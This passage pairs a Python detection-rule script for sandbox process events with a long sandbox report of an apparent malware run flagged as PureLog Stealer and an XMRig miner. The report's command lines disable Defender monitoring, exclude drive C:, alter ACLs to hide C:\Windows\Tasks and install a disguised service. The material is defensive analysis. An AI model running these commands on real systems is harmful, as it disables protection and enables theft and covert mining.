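     "cmdline": r'C:\Windows\system32\cmd.exe /c ""C:\programdata\ru.bat" "'},
    {"id": 8, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'C:\Windows\system32\cmd.exe /K "c:\programdata\st.bat"'},
    {"id": 10, "image": r"C:\Windows\SysWOW64\chcp.com", "cmdline": "chcp 65001"},
    {"id": 11, "image": r"C:\Windows\SysWOW64\tasklist.exe",
     "cmdline": 'tasklist /FI "IMAGENAME eq Superfetch.exe"'},
    {"id": 12, "image": r"C:\Windows\SysWOW64\find.exe",
     "cmdline": 'find /I /N "Superfetch.exe"'},
    {"id": 13, "image": r"C:\Windows\SysWOW64\takeown.exe",
     "cmdline": r"takeown /f c:\windows\tasks"},
    # Constructed benign control: an admin excluding one build directory, not a drive.
    {"id": 99, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe Add-MpPreference -ExclusionPath C:\Users\dev\src\build"},
]


@dataclass(frozen=True)
class Finding:
    event_id: int
    rule: str
    severity: str
    detail: str


def _defender_exclusion(ev):
    m = re.search(r"(?:Set|Add)-MpPreference\b.*?-Exclusion(?:Path|Process|Extension)\s+\"?([^\s\"]+)",
                  ev["cmdline"], re.I)
    if not m:
        return None
    target = m.group(1)
    # A whole-drive exclusion (c:\ , c:, c:\*) switches Defender off for everything on that volume.
    sev = "high" if re.fullmatch(r"[a-z]:\\?\*?", target, re.I) else "medium"
    return Finding(ev["id"], "defender_exclusion", sev, target)


def _script_from_programdata(ev):
    # Scripts dropped into C:\ProgramData and run via cmd /c or /K.
    m = re.search(r"\\programdata\\[^\s\"]+?\.(?:bat|cmd|vbs|ps1|js)\b", ev["cmdline"], re.I)
    return Finding(ev["id"], "script_in_programdata", "medium", m.group(0)) if m else None


def _takeown_system_path(ev):
    m = re.search(r"\btakeown\b.*?/f\s+\"?([^\s\"]+)", ev["cmdline"], re.I)
    if not m:
        return None
    path = m.group(1)
    # Taking ownership under C:\Windows is a prerequisite for writing where only TrustedInstaller may.
    sev = "high" if path.lower().startswith("c:\\windows\\") else "low"
    return Finding(ev["id"], "takeown_on_path", sev, path)


def _wow64_redirect(ev):
    # Image under SysWOW64 while the command line names System32: WoW64 file-system redirection.
    # Informational only, but it explains why path-based and cmdline-based rules disagree.
    if "\\syswow64\\" in ev["image"].lower() and "\\system32\\" in ev["cmdline"].lower():
        return Finding(ev["id"], "wow64_redirected_image", "info", ev["image"])
    return None


def _liveness_pair(events):
    # Correlate `tasklist /FI "IMAGENAME eq X"` with a `find "X"` in the same batch: the classic
    # "is my implant already running?" check. Neither half is suspicious alone.
    queried = set()
    for ev in events:
        m = re.search(r"\btasklist\b.*?IMAGENAME\s+eq\s+([^\s\"]+)", ev["cmdline"], re.I)
        if m:
            queried.add(m.group(1).lower())
    out = []
    for ev in events:
        m = re.search(r"\bfind\b.*?\"([^\"]+\.exe)\"", ev["cmdline"], re.I)
        if m and m.group(1).lower() in queried:
            out.append(Finding(ev["id"], "liveness_check_pair", "medium", m.group(1)))
    return out


PER_EVENT_RULES = (_defender_exclusion, _script_from_programdata, _takeown_system_path, _wow64_redirect)


def triage(events):
    """Run per-event rules, then cross-event correlation; return all findings."""
    findings = [f for ev in events for rule in PER_EVENT_RULES if (f := rule(ev))]
    findings.extend(_liveness_pair(events))
    return findings


def max_severity(findings):
    return max((f.severity for f in findings), key=SEVERITY_RANK.__getitem__, default="none")


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f.severity:6}] target {f.event_id:3} {f.rule}: {f.detail}")
    print("overall:", max_severity(triage(SAMPLE_EVENTS)))
```

The drive-root test is what separates the sandbox row (Target ID 4, exclusion of c:\) from the benign control (a single directory): both use the same cmdlet, so matching on Set-MpPreference alone would produce the same alert for an admin's routine change.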
Target ID: 14
Start time: 17:02:05
Start date: 08/12/2024
Path: C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit): true
Commandline: TIMEOUT /T 3 /NOBREAK
Imagebase: 0xad0000
File size: 25'088 bytes
MD5 hash: 976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges: true
Has administrator privileges: true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:15
                                                                                                                                                                                                  Start time:17:02:08
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:powershell Set-MpPreference -DisableRealtimeMonitoring $True
                                                                                                                                                                                                  Imagebase:0x960000
                                                                                                                                                                                                  File size:433'152 bytes
                                                                                                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:16
                                                                                                                                                                                                  Start time:17:02:09
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:powershell Set-MpPreference -ExclusionPath c:\
                                                                                                                                                                                                  Imagebase:0x960000
                                                                                                                                                                                                  File size:433'152 bytes
                                                                                                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:17
                                                                                                                                                                                                  Start time:17:02:11
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:icacls "C:\Windows\Tasks" /inheritance:e /grant "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"
                                                                                                                                                                                                  Imagebase:0xbb0000
                                                                                                                                                                                                  File size:29'696 bytes
                                                                                                                                                                                                  MD5 hash:2E49585E4E08565F52090B144062F97E
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:18
                                                                                                                                                                                                  Start time:17:02:11
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:icacls "C:\Windows\Tasks" /inheritance:e /grant "SYSTEM:(R,REA,RA,RD)"
                                                                                                                                                                                                  Imagebase:0xbb0000
                                                                                                                                                                                                  File size:29'696 bytes
                                                                                                                                                                                                  MD5 hash:2E49585E4E08565F52090B144062F97E
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:19
                                                                                                                                                                                                  Start time:17:02:11
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:icacls "C:\Windows\Tasks" /inheritance:e /grant "Administrators:(R,REA,RA,RD)"
                                                                                                                                                                                                  Imagebase:0xbb0000
                                                                                                                                                                                                  File size:29'696 bytes
                                                                                                                                                                                                  MD5 hash:2E49585E4E08565F52090B144062F97E
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:20
                                                                                                                                                                                                  Start time:17:02:11
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:icacls "C:\Windows\Tasks" /inheritance:e /grant "Users:(R,REA,RA,RD)"
                                                                                                                                                                                                  Imagebase:0xbb0000
                                                                                                                                                                                                  File size:29'696 bytes
                                                                                                                                                                                                  MD5 hash:2E49585E4E08565F52090B144062F97E
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:21
                                                                                                                                                                                                  Start time:17:02:11
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:icacls "C:\Windows\Tasks" /inheritance:e /grant "user:(R,REA,RA,RD)"
                                                                                                                                                                                                  Imagebase:0xbb0000
                                                                                                                                                                                                  File size:29'696 bytes
                                                                                                                                                                                                  MD5 hash:2E49585E4E08565F52090B144062F97E
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:22
                                                                                                                                                                                                  Start time:17:02:11
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:icacls "C:\Windows\Tasks" /inheritance:e /grant "user:(R,REA,RA,RD)"
                                                                                                                                                                                                  Imagebase:0xbb0000
                                                                                                                                                                                                  File size:29'696 bytes
                                                                                                                                                                                                  MD5 hash:2E49585E4E08565F52090B144062F97E
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:23
                                                                                                                                                                                                  Start time:17:02:11
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:icacls "C:\Windows\Tasks" /inheritance:e /grant "EVERYONE:(R,REA,RA,RD)"
                                                                                                                                                                                                  Imagebase:0xbb0000
                                                                                                                                                                                                  File size:29'696 bytes
                                                                                                                                                                                                  MD5 hash:2E49585E4E08565F52090B144062F97E
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:24
                                                                                                                                                                                                  Start time:17:02:11
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:TIMEOUT /T 3 /NOBREAK
                                                                                                                                                                                                  Imagebase:0xad0000
                                                                                                                                                                                                  File size:25'088 bytes
                                                                                                                                                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

Target ID:26
Start time:17:02:14
Start date:08/12/2024
Path:C:\ProgramData\migrate.exe
Wow64 process (32bit):true
Commandline:c:\programdata\migrate.exe -p4432
Imagebase:0x110000
File size:50'263'358 bytes
MD5 hash:20737946FC89B9DB44F82EAE5AD41ACB
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001A.00000003.1862977285.00000000093AC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 8%, ReversingLabs
Has exited:true

Target ID:27
Start time:17:02:17
Start date:08/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:C:\Windows\system32\cmd.exe /c ""C:\windows\tasks\run.bat" "
Imagebase:0x240000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:28
Start time:17:02:17
Start date:08/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:29
Start time:17:02:17
Start date:08/12/2024
Path:C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):true
Commandline:TIMEOUT /T 3 /NOBREAK
Imagebase:0xad0000
File size:25'088 bytes
MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:30
Start time:17:02:18
Start date:08/12/2024
Path:C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):true
Commandline:TIMEOUT /T 1 /NOBREAK
Imagebase:0xad0000
File size:25'088 bytes
MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:31
Start time:17:02:19
Start date:08/12/2024
Path:C:\Windows\Tasks\Wmiic.exe
Wow64 process (32bit):false
Commandline:"C:\windows\tasks\wmiic.exe" install WMService IntelConfigService.exe
Imagebase:0x140000000
File size:373'760 bytes
MD5 hash:A18BFE142F059FDB5C041A310339D4FD
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 74%, ReversingLabs
Has exited:true

Target ID:32
Start time:17:02:19
Start date:08/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:33
Start time:17:02:19
Start date:08/12/2024
Path:C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):true
Commandline:TIMEOUT /T 1 /NOBREAK
Imagebase:0xad0000
File size:25'088 bytes
MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:34
Start time:17:02:20
Start date:08/12/2024
Path:C:\Windows\Tasks\Wmiic.exe
Wow64 process (32bit):false
Commandline:"C:\windows\tasks\wmiic" start WMService
Imagebase:0x140000000
File size:373'760 bytes
MD5 hash:A18BFE142F059FDB5C041A310339D4FD
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:35
Start time:17:02:20
Start date:08/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:36
Start time:17:02:20
Start date:08/12/2024
Path:C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):true
Commandline:TIMEOUT /T 2 /NOBREAK
Imagebase:0xad0000
File size:25'088 bytes
MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

                                                                                                                                                                                                  Target ID:37
                                                                                                                                                                                                  Start time:17:02:20
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\Tasks\Wmiic.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\windows\tasks\Wmiic.exe
                                                                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                                                                  File size:373'760 bytes
                                                                                                                                                                                                  MD5 hash:A18BFE142F059FDB5C041A310339D4FD
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  Target ID:38
                                                                                                                                                                                                  Start time:17:02:20
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:39
                                                                                                                                                                                                  Start time:17:02:20
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\Tasks\IntelConfigService.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:"IntelConfigService.exe"
                                                                                                                                                                                                  Imagebase:0x7ff7554e0000
                                                                                                                                                                                                  File size:1'936'896 bytes
                                                                                                                                                                                                  MD5 hash:58E4115267B276452EDC1F541E3A8198
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                  • Detection: 56%, ReversingLabs
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  Target ID:42
                                                                                                                                                                                                  Start time:17:02:21
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\Tasks\Wrap.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\Tasks\Wrap.exe
                                                                                                                                                                                                  Imagebase:0x7ff726cf0000
                                                                                                                                                                                                  File size:371'200 bytes
                                                                                                                                                                                                  MD5 hash:39ADB356036E91008843B83EFB61131D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                  • Detection: 65%, ReversingLabs
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  Target ID:43
                                                                                                                                                                                                  Start time:17:02:21
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c icacls C:\Windows\Tasks /deny "%username%:(R,REA,RA,RD)"
                                                                                                                                                                                                  Imagebase:0x7ff6e92a0000
                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:44
                                                                                                                                                                                                  Start time:17:02:21
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  Target ID:45
                                                                                                                                                                                                  Start time:17:02:21
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c icacls C:\Windows\Tasks /deny "Users:(R,REA,RA,RD)"
                                                                                                                                                                                                  Imagebase:0x7ff6e92a0000
                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:46
                                                                                                                                                                                                  Start time:17:02:21
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:47
                                                                                                                                                                                                  Start time:17:02:21
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c icacls C:\Windows\Tasks /deny "Administrators:(R,REA,RA,RD))"
                                                                                                                                                                                                  Imagebase:0x7ff6e92a0000
                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:48
                                                                                                                                                                                                  Start time:17:02:21
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:49
                                                                                                                                                                                                  Start time:17:02:21
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:50
                                                                                                                                                                                                  Start time:17:02:21
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "C:\Windows\Tasks\ApplicationsFrameHost.exe" --daemonized
                                                                                                                                                                                                  Imagebase:0x7ff6e92a0000
                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  Target ID:51
                                                                                                                                                                                                  Start time:17:02:21
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\icacls.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:icacls C:\Windows\Tasks /deny "user-PC$:(R,REA,RA,RD)"
                                                                                                                                                                                                  Imagebase:0x7ff752040000
                                                                                                                                                                                                  File size:39'424 bytes
                                                                                                                                                                                                  MD5 hash:48C87E3B3003A2413D6399EA77707F5D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:52
                                                                                                                                                                                                  Start time:17:02:21
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\icacls.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:icacls C:\Windows\Tasks /deny "Administrators:(R,REA,RA,RD))"
                                                                                                                                                                                                  Imagebase:0x7ff752040000
                                                                                                                                                                                                  File size:39'424 bytes
                                                                                                                                                                                                  MD5 hash:48C87E3B3003A2413D6399EA77707F5D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:53
                                                                                                                                                                                                  Start time:17:02:21
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\Tasks\ApplicationsFrameHost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\Tasks\ApplicationsFrameHost.exe --daemonized
                                                                                                                                                                                                  Imagebase:0x7ff6a9510000
                                                                                                                                                                                                  File size:5'721'088 bytes
                                                                                                                                                                                                  MD5 hash:93CEEF4357070A8DDC0BEAC173547EC1
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000035.00000003.1908378022.0000020033251000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000035.00000002.4148260496.00000200332C1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000035.00000003.2249324527.000002003380A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000035.00000003.2249769366.00000200332C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000035.00000000.1906573384.00007FF6A98B3000.00000002.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000035.00000002.4148260496.0000020033227000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000035.00000002.4149570382.0000020033819000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000035.00000002.4148260496.0000020033241000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000035.00000003.2249324527.0000020033819000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
